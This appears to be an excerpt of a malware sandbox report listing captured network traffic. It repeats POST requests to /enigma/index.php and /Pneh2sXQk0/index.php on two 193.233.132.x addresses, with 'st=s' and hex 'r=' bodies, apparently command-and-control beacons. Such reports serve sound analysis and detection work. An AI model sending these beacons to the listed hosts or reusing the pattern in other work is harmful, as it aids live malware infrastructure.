Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Source: global traffic HTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
